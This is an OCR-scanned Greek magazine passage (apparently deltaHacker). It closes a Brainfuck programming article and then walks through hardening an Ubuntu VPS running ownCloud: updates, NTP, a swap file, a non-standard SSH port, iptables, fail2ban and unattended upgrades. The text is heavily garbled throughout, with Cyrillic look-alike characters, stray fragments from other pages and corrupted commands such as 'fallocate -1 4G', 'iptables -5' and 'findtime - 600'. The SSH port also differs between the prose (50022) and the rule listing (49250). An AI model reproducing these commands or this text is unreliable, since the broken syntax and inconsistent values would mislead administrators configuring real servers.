c8£ooupe τις ακόλουθες: 


Θυμηθείτε τι εἰπαμε προηγουμένως. Av o αριθμὸς στο кєлї З εἰναι μικρότερος, ο ёєі- 
κτης μνήμης θα καταλήξει να παραπέμπει στο κελὶ 3. Διαφορετικά, ο δείκτης μνήμης 
θα καταλήξει να παραπέμπει στο кєлї 2. Κάνοντας δύο ακόμα βήματα πίσω (προς 
τα αριστερὰ), av ο αριθμός στο κελἰ 3 εἶναι μικρότερος θα καταλήξουμε στο кєл! 
1. Στην αντίθετη περίπτωση θα καταλήξουμε στο κελἰ 0. Όμως, το κελἰ μηδὲν EXE! 
την τιμή 0, ενὠ το κελἰ 1 ἐχει την τιμὴ 1. (Ουφ!) Επομένως, αν ο αριθμὀὸς ото кєлї 
3 εἶναι μικρότερος κι ἐχουμε καταλήξει στο κελί 1, ο τελικὸς βρόχος θα εκτελεστεί. 
Στην αντίθετη περίπτωση θα ἐχουμε καταλήξει στο κελὶ 0, κι o TEAIKOG βρόχος δεν 
θα εκτελεστεἰ. 


Απλό δεν ἦταν; Και yia το κερασάκι στην τούρτα, αξίζει να σημειώσουμε το εξἠς: 
Όταν o αριθµμὀς στο кєлї 3 εἶναι μεγαλύτερος ἡ ἴσος µε rov αριθμό στο кєлї 4, στο 
τέλος της σύγκρισης το кєлї 3 θα διατηρεἰ την διαφορὰ των δύο. Προφανώς, av 
αυτή η διαφορά εἶναι µηδενικἠ, τότε oi δύο apiOpoi εἶναι ἰσοι. Αυτή τη λεπτομέρεια 
μπορούμε να την έχουμε ката vou και να την αξιοποιήσουµε отау θέλουμε va TOE- 
κάρουµε την ισότητα δύο αριθμών. 


Brainfuck IDE; 


Όπως θα ἐχετε καταλάβει, ο προγραμματισμός στη Brainfuck εἶναι αρκετά OKANPOG 
και απαιτεἰ µια πολὺ διαφορετικἠ λογική ano αυτήν που έχουμε αναπτύξει. Ακριβώς 
Үү" αυτό, ката τη γνώμη µας πάντα, η γλὠσσα αποτελεἰ µια πολύ ενδιαφἐρουσα 
πρὀκληση/άσκηση yia τη σκέψη. Па калі µας τύχη, αν και πρὀκειται για γλὠσσα 
που δεν χρησιμοποιείται σε αληθινές εφαρμογὲς, κάποιοι προγραμματιστὲς ἐχουν 
δημιουργἠσει ολόκληρα IDE ү αυτή. ‘Eva ano αυτά εἶναι το λεγόμενο "Brainfuck 
Developer", που μπορείτε να κατεβάσετε ελεύθερα апо τη διεύθυνση http: //Amhz.de/ 
bfdev.html. To εν λόγω πρόγραµµα ενσωματώνει vav interpreter yia τη Brainfuck, 
όπως επἰσης και τις βασικὲς λειτουργίες ενός debugger. Μέσα ano το περιβάλλον 
του μπορούμε να εκτελούμε προγράμματα σε Brainfuck γραμμή προς γραμμὴ και, 
ταυτόχρονα, να παρακολουθούμε τις αλλαγὲς отп μνήμη. ‘Eva akópa IDE που αξίζει 
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την προσοχὴ µας εἶναι ro "Visual Brainfuck", που θα βρείτε στη σελἰδα https://sites. 
google.com/site/visualbf. Το συγκεκριμένο IDE περιλαμβάνει ὀλες τις δυνατότητες 
του "Brainfuck Developer", ενώ επιπρὀσθετα δημιουργεἰ κι εκτελἐσιµα προγράµµατα 
µε τη βοήθεια του ενσωματωμένου compiler. Πάντως, αν δοκιμάσετε τα δύο IDE και 
καταλήξετε στο прото, UNOPEITE να μετατρέψετε τα προγρἀμματά σας σε EKTEAE- 
ора µε τη βοήθεια ενὸς εξωτερικού μεταγλωττιστή. Mia καλἠ λύση αποτελεἰ o Às- 
γόμενος Brainfucked, που µπορείτε να κατεβάσετε апо το http://spartusch.github. 
io/legacy-website/html en/bfd.html. О συγκεκριμένος compiler παράγει λιλιπούτεια 
προγράµµατα "СОМ", που εκτελούνται σε οποιοδήποτε σύστημα Windows µπορείτε 
να τρέξει Ίθμπιτο κὠδικα. 


Н ενασχόληση µε την Brainfuck µας χάρισε αρκετά απογεύματα διασκέδασης και 
ακονίσµατος του μυαλού. Ελπἰζουμε να την απολαύσετε κι εσεἰς και περιμένουμε va 
δούμε τα бка σας δημιουργήματα :) 


on Б παπα” 
File Edit Run Tools Help 
Dea е | пиш | Additional] Samples | Math | Logic | 
Sim › Ὁ 4 коесы) |: Ξ Җ A om tae 
Debugger Options Input {| Program 
AM Animate 12345 
Ө [v ~ Breakpoints 
Display 
© Decimal 


C Hex 
С ASCII 


Peek & Poke 


М Ignore CR 


Memory Tape 
алиллалал A 

Program Tape 
133353π335335333Ππ3ΒΠ РЕН ЕНЕР ЕР 


| Visual brainfuck Integrated Development Environment 


Ж 


4 


To "Visual Brainfuck" διαθέτει ὀμορφες απεικονίσεις, Οἱ 
οποίες ωστόσο δεν εἶναι ιδιαίτερα χρήσιμες. Oa το xa- 
ρακτηρἰζαμε апла φανταιζί! О ενσωματωμένος compiler, 
όµως, αποτελεί µεγάλη ευκολία. 
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1АЙ πρόσβαση µέσω ‚ Χωρίς να δίνουμε κἄποιο passwo 
κλειδιών. Υπάρχουν πολλά ακόµη που μπορούμε και οφείλουμε 
| ενισχύσουμµε περισσότερο την ασφάλεια TOU serv 


p @TO άρθρο rou αφιερὠματός µας για τη δημιουργία εν 
; 
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Ένας server, δύο σύννεφα [μέρας 2/31 
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Την πρώτη µας σύνδεση στο eyjafjallajokull.parabing.com την κάναμε апо ёха 
Windows РС, µε τη βοήθεια του PuTTY. Av θυμόσαστε, ως image yia To Droplet 
επιλἐξαµε EKEIVO µε προεγκατεστημένο το ownCloud 8.0, σε Ubuntu Server 14.04 
LTS µε LAMP stack. Αμέσως μετὰ τη σύνδεση, στην κονσόλα µας εἶδαμε μερικἁ 
στατιστικἀ στοιχεία που αφορούσαν στο σύστημα, καθώς και τα περιεχόμενα TOU 
αρχείου /etc/motd.tail. Στο εν λὀγω αρχεἰο υπάρχει TO username rou διαχειριστἠ του 
ownCloud (admin), καθώς και To αντίστοιχο "εργοστασιακὀ" password. Το τελευταίο 
εννοείται ότι οφείλουμε να το αλλάξουμε άμεσα (και μετὰ μπορούμε να διαγράψουµε 
και то /etc/motd.tail). Επειδή ωστόσο δεν εἶναι βἐβαιο ὁτι κι сіс επιλέξατε το own- 
Cloud image για ro Droplet σας, ας ξεκινήσουμε καλύτερα µε τις βασικὲς εργασἰες 
που οὗτως ἡ άλλως προτείνεται να κάνουμε σε KAGE VPS. Па τη συνέχεια, μόνη µας 
προὐπόθεση εἶναι ότι το λειτουργικὀ rou Droplet εἶναι το Ubuntu Server 14.04 LTS. 
Αν υπάρχουν £&rpa software stacks ἡ ὀχι, προς ro napov δεν EXE! σημασία. 


Κατ' αρχάς, χρειάζεται να ορίσουμε Eva кало password yia το λογαριασμὀ Tou root: 
root@eyjafjallajokull:~# 
Enter new UNIX password: 
Retype new UNIX password: 


passwd: password updated successfully 


Н πρώτη απομακρυσμένη σύνδεση στο VPS µας, µέσω SSH 
ка! µε password-less login. To image nou εἶχαμε επιλέξει 
προηγουμένως, ката τη δημιουργία Tou Droplet, ixe και 
το ownCloud. П' αυτὀ και τώρα πληροφορούμαστε για TO 

"εργοστασιακὀ” password του χρήστη admin. 
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N88 NDEI ΧΧΧ 33 393999 


Καθώς ro πληκτρολογούμε, ro password δεν φαίνεται στην οθὀνη. Προτείνουμε va 
ορἱσετε Eva ruxaio password µε μεγάλο μήκος, που να συνδυάζει πεζἀ και κεφαλαία, 
να περιλαμβάνει αριθμούς καθώς και σύμβολα. Па Eva npayparikà τυχαίο password 
αξίζει να καταφύγετε σε κἄποιο εργαλείο ὁπως ro "Generate Secure Password", του 
δημοφιλούς browser add-on ονόματι LastPass. Εἶναι αδύνατο να θυμάται κανεὶς Eva 
password σαν αυτό που περιγράφουμε, οπὀτε και προτείνουμε να το αποθηκεύσετε 
ως "Secure Note" του LastPass. Οὗτως ἡ ἄλλως, σε Aiyo θα φροντίσουμε WOTE 
το σύστημα να δέχεται μόνο password-less logins: μόνον ὀποιος ἐχει στείλει TO 
δημόσιο κλειδὶ του σε λογαριασμὀ χρήστη, θα µπορεί να συνδέεται σ' αυτὸν (μέσω 
SSH). Ειδικἀ για το λογαριασμὀ rou root, θα ρυθµἰσουµε τον OpenSSH server ώστε 
να µη δέχεται απομακρυσμένα logins *нє Kavévav* τρόπο. To password rou root 
θα το χρειαζόμαστε μόνο σε σπάνιες περιπτώσεις, οπὀτε θα καταφεύγουµε στη web 
console της DigitalOcean. Αν για κἀποιο λὀγο έχουμε χάσει TO password, ευτυχώς 
παρέχεται και η δυνατότητα "Reset Root Password" (στο VPS γίνεται shutdown και 
λαμβάνουμε email µε veo root password). Ката τα ἄλλα, µέσω SSH και µε key- 
based authentication, θα συνδεόμαστε στο λογαριασμό ενὸς απλού χρήστη nou 
θα δημιουργήσουμε λίγο αργότερα. Όποτε χρειαζόμαστε δικαιώματα root, θα τα 
αποκτάμε µε τη βοήθεια του sudo. 


Postfix Configuration 
Please select the mail server configuration type that best meets your needs. 


No configuration: 

Should be chosen to leave the current configuration unchanged. 

Internet site: 

Mail is sent and received directly using SMTP. 

Internet with smarthost: 

Mail is received directly using SMTP or by running a utility such 

as fetchmail. Outgoing mail is sent using a smarthost. 

Satellite system: 

All mail is sent to another machine, called a 'smarthost', for delivery. 
Local only: 

The only delivered mail is the mail for local users. There is no network. 


General type of mail configuration: 


Internet Site 

Internet with smarthost 
Satellite system 

Local only 


«Cancel» 


Αναβαθµἰζουμε ro Ubuntu Server kai ξαφνικά καλούμαστε 
va πάρουμε µια απόφαση yia To postfix. Φυσικά και δεν 
κάνουμε καμία αλλαγή στις προεπιλογἑς. Εξάλλου ό,τι 
αφορά σε mailserver αποτελεί θέμα ἄλλου αφιερώματος :) 
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Ενημέρωση λειτουργικού συστήματος 
Θέλουμε va αναβαθµἰσουμε το σύστημα µε τα πλέον πρόσφατα security patches κι 
ενημερώσεις. Αρχικἀ, φρεσκάρουµε τη Alora µε τα repositories: 
root@eyjafjallajokull:~# apt-get update 
Н αναβάθμιση γίνεται πληκτρολογώντας 
root@eyjafjallajokull:~# apt-get dist-upgrade 


Λογικά θα χρειαστεἰ να κατέβουν αρκετά πακέτα, αλλά δεν υπάρχει πρὀβλημα: 
Αφενός η σύνδεση του VPS µε rov ἐξω κόσμο εἶναι ταχύτατη, αφετέρου ο EIKOVIKOG 
του δίσκος εἶναι πάνω σε φυσικό δίσκο SSD. Έτσι, η διαδικασία της αναβάθμισης δεν 
θ' αργἠσει va ολοκληρωθεί. Στο δικὀ µας VPS άλλαξε κι ο πυρήνας του λειτουργικού, 
οπότε για να ενεργοποιηθεί ο νέος προχωρήσαµε σε επανεκκίνηση: 


root@eyjafjallajokull:~# sudo reboot 


Μετὰ To reboot συνδεθήκαμε ξανὰ κι αμέσως απομακρύναμε ορισμένα πακέτα που 
αφορούσαν σε προηγούμενη ἐκδοση του πυρήνα: 


root@eyjafjallajokull:~# apt-get autoremove 
Όλα кала. 


Ζώνη ὠρας και τήρηση χρόνου 


Οφείλουµε να φροντίσουμε για την επιθυμητή ζώνη ὠρας του server, WOTE TO ρολὀι 
του και τα time stamps να βγάζουν εύκολα νόημα. О кадорісрос ζώνης ὡρας γίνεται 
δίνοντας 


root@eyjafjallajokull:~# dpkg-reconfigure tzdata 


Ορἰσαμετη ζώνη Europe/Athens, αν και yia µια στιγµἠ ομολογούμεπως µας γοήτευσε 
auro ro Antarctica/Troll. Επειδἠ εξάλλου το ρολόι κάθε συστήµατος EXE! µια τάση va 
"χάνει", προσθέτουμε στο σύστημα τον NTP deamon ὥστε ауа паса στιγμὴ το ρολὸι 
να εἶναι συγχρονισμένο µε ακριβεἰς time servers: 


root@eyjafjallajokull:~# apt-get install ntp 


Δεν χρειάζεται va κάνουμε кат! για τον NTP, αφού αμέσως μετὰ την εγκατἀστασἠ 
του ενεργοποιείται και δουλεύει σωστά. 


Δημιουργία χώρου αντιµετάθεσης 
‘Eva ano τα εργαλεία nou µας αρέσει να εγκαθιστούµε σε κάθε σύστημα Linux, εἶναι 
το htop: 
root@eyjafjallajokull:~# apt-get install htop 
Όταν το τρἐξαµε, δίνοντας апла 
root@eyjafjallajokull:~# htop 


παρατηρἠσαμε оті στο σύστημα δεν υπήρχε swap partition (To htop To εγκαταλείπουµε 
πατώντας [Q]). Σίγουρα για τη μνήμη swap ισχύει το "αχρείαστη va 'ναι". Πράγματι, 
το σύστημα σέρνεται, για va ro πούμε апла, όταν φτάνει στο σηµείο va χρησιµοποιεὶ 
μεγάλο ποσοστό της. Επειδἠ όμως δεν μπορούμε v' αποκλεἰσουµε OT! θα υπάρξουν 
περιπτώσεις ónou θα χρειαστεἰ μνήμη swap, кало εἶναι να δημιουργήσουμε and 
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тора Eva αρχείο ro onoio θα έχει ρόλο τέτοιας μνήμης. Ένας κανόνας yia το μέγεθος 
του αρχείου swap opiZel πως πρέπει va 'ναι διπλάσιο апо αυτό της μνήμης RAM. 
To Droplet µας ἐχει 2GB RAM, ара το μέγεθος του αρχείου αντιμετάθεσης -ἐτσι 
ονομάζεται το swap file- θα εἶναι 4СВ. 


Στη pia rou filesystem δημιουργούμε Eva αρχείο µε буора "swapspace" και μέγεθος 
4GB: 


root@eyjafjallajokull:~# fallocate -1 4G /swapspace 
root@eyjafjallajokull:~# ls -lh /swapspace 
-rw-r--r-- 1 root root 4.0G Mar 6 19:50 /swapspace 


Μόνο οι διεργασἰες µε δικαιώματα root επιτρέπεται να 'χουν πρόσβαση oro swap- 
space: 


root@eyjafjallajokull:~# chmod 600 /swapspace 
root@eyjafjallajokull:~# 15 -1һ /swapspace 
spass 1 root root 4.0G Mar 6 19:50 /swapspace 


Διαμορφώνουμε κατάλληλα το swapspace, ώστε να µπορεί va χρησιμοποιηθεἰ ως 
χῶρος αντιµετάθεσης: 


root@eyjafjallajokull:~# mkswap /swapspace 
Setting up swapspace version 1, size - 4194300 KiB 
no label, UUID-7c0c3f3d-5795-41fa-8fc5-d9951fdc1d01 
Ενεργοποιούµε στη συνέχεια τη μνήμη swap, πάνω апо το αρχείο swapspace: 
root@eyjafjallajokull:~# swapon /swapspace 


Αν тора τρέξουµε ξανά ro htop, βλέπουμε бт! έχουμε *kar* μνήμη swap. Αντί yia To 
htop, η ὑπαρξή της υποδηλώνεται KI апо την ἐξοδο του εργαλείου free: 


root@eyjafjallajokull:~# free 


total used free shared buffers cached 
Mem: 2049960 227672 1822288 5916 15132 102612 
-/+ buffers/cache: 109928 1940032 
Swap: 4194300 2 4194300 


Ουσιαστικἁ, µε το swapon προσαρτήσαμε ro /swapspace ως ҳоро αντιµετάθεσης. 
Αυτἠ η προσάρτηση θέλουμε να γίνεται αυτόματα κάθε фора που ξεκινά το 
λειτουργικό, οπότε προσθέτουμε την κατάλληλη γραμμή στο τέλος του αρχείου 
/etc/fstab. Το ανοίγουμε µε κάποιον text editor, όπως, π.χ., εἶναι TO nano... 


root@eyjafjallajokull:~# nano /etc/fstab 
„ка στο τέλος του προσθέτουμε την ακόλουθη γραμμή: 
/swapspace none swap sw Ө ө 


Μέσα ano To nano, τις αλλαγὲς ото fstab ric αποθηκεύουμε µε [CTRL4-O] και [Enter], 
ενὠ TO πρὀγραμμα το εγκαταλεἰπουµε µε [CTRL+X]. 
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EP root@eyjafjallajokull: 


1- [p s 31, 19 thr; 1 running 
2 d av 0.13 0.05 
MemELLLLLL LEEELELLL I Uptime: 00:03:02 

Swp[ 


PID USER PRI NI VIRT RES SHR S CPUX МЕМ% TIME+ 
5254 root 
1011 


Αχρείαστη να 'vai η μνήμη swap, av биос δεν χαρίσουµε 
χώρο αντιµετάθεσης στο λειτουργικό τότε δεν θα μπορούμε 
va κοιμηθούμε τα βράδια. Ναι, τέτοιοι εἰμαστε. 


Ενίσχυση ασφάλειας για To OpenSSH 


Κάθε Droplet της DigitalOcean εἶναι ἐτσι ρυθμισμἑνο ὥστε να δέχεται ασφαλεὶς 
απομακρυσμένες συνδέσεις SSH, χάρη στον OpenSSH server που ενεργοποιείται 
αυτόματα κατὰ την εκκίνηση του λειτουργικού. Н ασφάλεια που παρέχει TO 
πρωτόκολλο SSH εἶναι δυνατὸν να ενισχυθεὶ περισσότερο. Προς αυτή την 
κατεύθυνση, θα παρουσιάσουμε τις ελάχιστες τροποποιήσεις που µας αρέσει να 
κάνουμε στον OpenSSH server. 


Πα αρχή θα αλλάξουμε uia µόνο παράμετρο, ώστε να αποφεύγουμε Eva μεγάλο 
ποσοστό brute force attacks. Όχι ότι το password του root εἶναι αδύναμο κι εὐκολο 
να µαντευτεί, αλλά γιατἰ ν' απασχολείται ἁδικα το Droplet µας; Οι αυτοματοποιημένες 
επιθέσεις, βλέπετε, πραγματοποιούνται апо scripts τα οποία ψάχνουν για ενεργούς 
servers και για γνωστές υπηρεσίες. Όποτε βρίσκουν ενεργὀ μηχάνημα µε ανοικτό 
port υπηρεσίας nou ἐχει γνωστὲς ευπάθειες, πιθανώς να δοκιμάζουν µια σειρἀ 
ano exploits. Όταν πάλι βρίσκουν ενεργὀ μηχάνημα µε ανοικτό port υπηρεσίας 
που δέχεται logins, EkTOG апо τη δοκιμή exploits συχνὰ εξαπολύουν κι Eva brute 
force attack, ката το οποίο ελέγχονται δημοφιλή user names και passwords ano 
προκαθορισμένα λεξικἀ. 


To στάνταρτ port yia To SSH εἶναι το 22. AUTO που μπορούμε να κάνουμε άμεσα εἶναι 
να το αλλάξουμε σε κἄποιο µη-προφανές ἡ αν θέλετε "άσχετο" port. Τα περισσότερα 
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brute force scripts θα βλέπουν бт! δεν υπάρχει ενεργἠ υπηρεσία πἰσω апо ro port 
22, ара avri να ψάχνουν για SSH server σε άλλα ports του ἰδιου host -εργασία nou 
θα κὀστιζε πολύ σε χρὀνο-, θα εγκαταλείπουν κι ενδεχομένως θα περνούν στον 
επόμενο host. Па την αλλαγἠ του προκαθορισµένου port ανοίγουμε το αρχείο /etc/ 
ssh/sshd, config µε ro nano... 


root@eyjafjallajokull:~# nano /etc/ssh/sshd config 
βρίσκουμε τη γραμμή 

Рог 22 
«καὶ την αλλάζουμε ὡστε γίνει σαν την ακόλουθη: 

Port 50022 


Δεν εἶναι βέβαια απαραίτητο να βάλετε κι εσεἰς то port 50022, αλλά καλύτερα να 
ορίσετε Eva πάνω апо το 50000. Αποθηκεύουμε την αλλαγἡ µας, εγκαταλείπουµε то 
nano κι επανεκκινούµε την υπηρεσία του OpenSSH: 


root@eyjafjallajokull:~# service ssh restart 


H σύνδεση που тора υφίσταται KI апо την οποία αλληλεπιδρούμε µε TO Droplet, 
δεν θα διακοπεί. Οι επὀµενες, όμως, θα πρέπει να γίνονται προς το port που μόλις 
καθορίσαµε (n.x., προς το 50022). Προφανώς, o ὀποιος SSH client χρησιμοποιούμε 
πρέπει va 'ναι ενήμερος yia το µη-τυπικό port. 

Να τονίσουμε εδώ От! η αλλαγἠ port δεν θα αποτρέψει Evav αποφασισμένο attacker, 


о οποίος στοχεύει ειδικἁ το μηχάνημὰ µας και ψάχνει για ενεργἠ υπηρεσία SSH. Π' 
аото και σε λίγο θα αναλάβουµε περισσότερα µέτρα προστασίας. 


Ενεργοποίηση firewall 


Δε νοείται server στο cloud χωρίς Eva καλά ρυθμισμένο firewall. Για το VPS µας, 
θα χρησιμοποιήσουμε To iptables. Ουσιαστικά πρὀκειται για va front-end του 
netfilter, το οποίο παρέχει µεθόδους για το χειρισμό του Linux networking stack. 
Εἰμαστε апо εκείνους nou µε το iptables διατηρούν ша σχἐση αγάπης-μίσους. 
Όποτε διαβάζουμε ү αυτό, κατανοούµε τη λογικἠ του και µας αρἑσει. Μετά апо Aiyo 
καιρό όμως αρχίζουμε να ξεχνάμε βασικἀ πράγματα, οπότε ἐρχεται η περἰοδος της 
αντιπάθειας. Προσφάτως κάναμε ξανὰ μερικὰ μαθήματα nepi iptables, διαβάζοντας 
TO OXETIKO άρθρο στο deltaHacker 014. Πα τη συνέχεια υποθέτουμε бт! κι εσεἰς 
ἐχετε παρακολουθήσει τα ἴδια -ἡ napópoia- μαθήματα. 


Εξ ορισμού, το iptbales στο Droplet µας ἐχει την προκαθορισμένη πολιτικἡ ACCEPT 
για τις τρεις βασικὲς αλυσίδες (INPUT, OUTPUT και FORWARD): 


root@eyjafjallajokull:~# iptables -L 
Chain INPUT (policy ACCEPT) 


target prot opt source destination 


Chain FORWARD (policy ACCEPT) 


target prot opt source destination 


668 


Ένας server, δύο σύννεφα [μέρας 2/31 
ΓΚκΜ κ κΜκΜκΜΗ! ΜΗ!Μ!ΜΗ!ΜΗ ἳΨἳΨἳΨΜΨΜΨΜΨΜΨΜΨΜψΜΨΜΨΜΨΜΨΜΨΜΨΜΨΜΨΜΨΜΨΜκΜκἊΜἊἩἊἒ͵φὙακαὙ“ἛαἊααιαι. 


Chain OUTPUT (policy ACCEPT) 


target prot opt source destination 


root@eyjafjallajokull:~# 
Μετις αλυσίδες OUTPUT και FORWARD δεν έχουμε θέμα. Στην INPUT όμως θέλουμε 
να προσθέσουμε συγκεκριμένους κανόνες, µε στὀχο: 
ο та εισερχόμενα πακέτα oro loopback interface va γίνονται πάντα δεκτά (ana- 
pairnro για ορισμένες εφαρμογές του συστήματος) 
ο oi ἤδη εγκαθιδρυµένες συνδέσεις να διατηρούνται (απαραίτητο WOTE να µην 
κλειδωθούμε ката λάθος ἐξω апо To VPS) 
ο та εισερχόμενα πακέτα ТСР στο port 22 -ἠ σε ὁποιο ἄλλο έχουμε καθορίσει για 


τον OpenSSH server- να γίνονται πάντα δεκτὰ, WOTE να έχουμε δυνατότητα 
απομακρυσμένης σύνδεσης µέσω SSH 


ο та εισερχόμενα πακέτα TCP στο port 443 να γίνονται πάντα δεκτἀ, WOTE va 
εἶναι εφικτὲς οι ασφαλείς συνδέσεις HTTPS προς το ownCloud 


ТЭ rootGeyjafjallajokull: 


Configuring iptables-persistent 


Current iptables rules can be saved to the configuration file /etc/iptables/rules.v4. These rules will then be 
loaded automatically during system startup. 


Rules are only saved automatically during package installation. See the manual page of iptables-save(8) for 
instructions on keeping the rules file up-to-date. 


Save current IPv4 rules? 


Εγκαθιστούµε το εξαιρετικἀ βολικό iptables-persistent καὶ ro installation 
script ζητά την ἁδειά µας, προκειµένου va αποθηκεύσει τους κανόνες TOU 
iptables που ισχύουν αυτή τη στιγµή κι αφορούν στο ΙΡν4. Του δίνουμε 
την ἀδειά µας - Kal то ἰδιο κάνουμε και yia τους κανόνες που αφορούν 
στο IPv6 (ki ac µη χρησιμοποιούμε δικτύωση IPv6). 
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ο Ола τα алла πακέτα, οποιουδήποτε πρωτοκόλλου και προς οποιοδήποτε port, 
να απορρίπτονται. 


Ξεκινάμε µε rov κανόνα yia ro loopback interface (lo): 
root@eyjafjallajokull:~# iptables -A INPUT -i lo -j ACCEPT 


Συνεχίζουμε µε τον κανόνα για τη διατήρηση των Non εγκαθιδρυµένων συνδέσεων 
(established connections): 


root@eyjafjallajokull:~# iptables -A INPUT -m  conntrack  --ctstate 
ESTABLISHED,RELATED -j ACCEPT 


Ακολουθούν οι δύο κανόνες yia την αποδοχἠ συνδέσεων προς τον OpenSSH server, 
καθώς και προς rov web server: 


root@eyjafjallajokull:~# iptables -A INPUT -p tcp --dport 22 -j ACCEPT 
root@eyjafjallajokull:~# iptables -A INPUT -p tcp --dport 443 -j ACCEPT 


Ὁλατα εισερχόμενα nak£ra nou δεν ταιριάζουν oe kavévav ano TOUG npoavadgepO£vreg 
κανόνες, να απορρίπτονται: 


root@eyjafjallajokull:~# iptables -A INPUT -j DROP 
Ας δούμε тора ὁλους τους κανόνες που μόλις δώσαμε: 

root@eyjafjallajokull:~# iptables -5 

-P INPUT ACCEPT 

-P FORWARD ACCEPT 

-P OUTPUT ACCEPT 

-A INPUT -i lo -j ACCEPT 

-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT 

-A INPUT -p tcp -m tcp --dport 49250 -j ACCEPT 

-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT 

-A INPUT -j DROP 


Θεσπέσια. Οι κανόνες ἐχουν οριστεἰ όπως πρέπει και η ασφάλεια του VPS µας ἐχει 
εκτοξευτεί στα ουράνια (ἡ &oro λίγο πιο като). Υπάρχει Eva πρόβλημα ὁμως: Στο 
επόμενο reboot οι κανόνες δεν θα φορτωθούν και θα ισχύει η προκαθορισμένη 
πολιτικἠ (ACCEPT). Υπάρχουν διάφοροι τρόποι προκειµένου οι κανόνες του iptables 
να ισχύουν και μετὰ το reboot. Μπορούμε, π.χ., να τους μαζέψουμε σε Eva script, το 
οποίο θα εκτελείται αυτόματα μετὰ την εκκἰννηση του λειτουργικού. Προτείνουμε 
vav μάλλον κομψότερο τρόπο: την εγκατάσταση του πακέτου iptables-persistent. 


root@eyjafjallajokull:~# apt-get install iptables-persistent 


Κατά την εγκατάσταση θα ερωτηθούμε για ro αν επιθυμούμε την αποθήκευση των 
κανόνων Tou iptables, που ισχύουν yia τα IPv4 και IPv6. Απαντάμε Өєтіка - κι ας 
μην χρησιμοποιούμε το IPv6. Στο εξἠς, κάθε φορά που θα ξεκινά το λειτουργικὀ θα 
ενεργοποιούνται ὁλοι οι κανόνες Tou iptables οι οποίοι ἰσχυαν πριν το τελευταίο 
reboot/shutdown - rj ακριβέστερα ¿wc την τελευταία στιγµἠ που δώσαμε "service 
iptables-persistent save" (xwpic τα εισαγωγικά). 
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Αποκλεισμός των EVOXANTIKOV 

To firewall апо μόνο του δεν θα αποτρέψει ὁσους αποφασίσουν να εκμεταλλευτούν 
κάποιες υπηρεσίες Tou Droplet µας, π.χ., εξαπολύοντας ша στοχευµένη επίθεση 
brute-force ἡ DoS. Па va αποθαρρύνουµε τέτοιες συμπεριφορές χρειαζόμαστε κάτι 
πιο "τιμωρητικό", ὁπως εἶναι To fail2ban. Па το συγκεκριµένο εργαλείο µπορείτε va 
διαβάσετε αναλυτικἁ στο σχετικὀ άρθρο Tou deltaHacker 034. Па ro eyjafjallajokull, 
τη στιγμή που γράφονται αυτὲς οι γραμμές οι επεμβάσεις που £xoupe κάνει στο /etc/ 
fail2ban/jail.local συνοψίζονται παρακάτω: 


ignoreip = 127.0.0.1/8 
bantime = 1800 # was: 600 
findtime - 600 


maxretry - 3 


destemail = root@localhost 
sendername = Fail2Ban 
mta = sendmail 


action = %(action_mw)s # was: action = %(action_)s 


[ssh] 
enabled = true 
port = 49250 # was: ssh 
filter = sshd 
logpath = /var/log/auth.log 
maxretry = 6 

[ssh-ddos] 
enabled = true # was: false 
port = 49250 # was: ssh 
filter = sshd-ddos 
logpath = /var/log/auth.log 
maxretry = 6 

[apache] 
enabled = true # was: false 
port = https # was: http,https 
filter = apache-auth 


logpath = /var/log/apache*/*error. log 


maxretry = 6 
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Αυτόματες ενημερώσεις ασφαλείας 


Ὅσο καλὰ κι αν EXOUHE προστατευμένο тоу server, µια γνωστὴ (ἡ ἁγνωστη) αδυναμία 
σε δικτυακἠ υπηρεσία και λίγη αμέλεια апо μέρους µας, εἶναι ακριβώς ὀ,τι χρειάζεται 
ἑνας attacker yia v' αποκτήσει μη-εξουσιοδοτηµένη πρόσβαση στο σύστημα. Λέμε, 
λοιπὸν, OT! επειδἠ ἄνθρωποι εἰμαστε και συχνά ξεχνάμε ἠ/και τρέχουμε µε dAAa 
θέματα, τουλάχιστον οι γνωστές αδυναμἰες yia τις οποίες ἐχουν κυκλοφορήσει se- 
curity patches кало εἶναι να επιδιορθώνονται αυτόματα και ἐγκαιρα. Ένα epyaAeio 
ү" αυτἠ τη δουλειὰ στο Ubuntu παρέχεται апо το пакёро unattended-upgrades 
και στο Droplet µας ἦταν nón εγκατεστημένο. Προκειμένου να ενεργοποιήσουµε 
τις αυτόματες εγκαταστάσεις *uóvo* για τα updates που αφορούν στην ασφάλεια, 
πειράξαμε ελαφρώς τα αρχεία /etc/apt/apt.conf.d/1O0periodic και /etc/apt/apt. 
conf.d/50unattended-upgrades. Συγκεκριµένα, φροντἰσαμε oore το 10periodic να 
περιέχει τις ακόλουθες γραμμὲς: 

APT::Periodic::Update-Package-Lists "1"; 

APT::Periodic::Download-Upgradeable-Packages "1"; 

APT::Periodic::AutocleanInterval "7"; 

APT::Periodic::Unattended-Upgrade "1"; 


Στο δε 50unattended-upgrades κάναμε uia µόνο επέμβαση, ορἰζοντας την τοπικἠ 
διεύθυνση email του root: 


Unattended-Upgrade::Mail "root@localhost"; 


Σε αυτή τη διεύθυνση αποστέλλονται μηνύματα που αφορούν στα αυτόματα securi- 
ty updates. Παρεμπιπτόντως, ἑνα βολικὀ πρὀγραμμα για να διαβάζουμε ra email του 
συστήματος апо την text console εἶναι το mutt, το οποίο παρέχεται апо το ομώνυμο 
πακέτο. 


Δημιουργία νέου χρήστη 


Ὅπως αναφἑἐραµε και προηγούµενως, στο διαρκἠ µας αγὠνα για την ενίσχυση της 
ασφάλειας του server εἶναι калд ιδέα να δημιουργήσουμε Eva λογαριασμὀ απλού 
χρήστη και να συνδεόµαστε μόνο σ' αυτόν. Όποτε χρειαζόμαστε δικαιώματα 
διαχειριστή, θα τα ἐχουμε µε τη βοήθεια του sudo. Ας δούµε τη δηµιουργία ενὸς 
νέου χρήστη, ονόματι admin: 


root@eyjafjallajokull:~# adduser admin 

Adding user ~ admin" 

Adding new group `аатіп' (1000) ... 

Adding new user ~admin' (1000) with group ~admin' 
Creating home directory ~/home/admin' 

Copying files from ~/etc/skel' 

Enter new UNIX password: τρομακτικά δυνατό password 
Retype new UNIX password: τρομακτικά δυνατό password 
passwd: password updated successfully 


Changing the user information for admin 
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Enter the new value, or press ENTER for the default 
Full Name []: 
Room Number []: 
Work Phone []: 
Home Phone []: 
Other []: 
Is the information correct? [Y/n] 


Ξανά, να τονίσουμε ὁτι TO password πρέπει να εἶναι τυχαίο Kal µε μεγάλο μήκος 
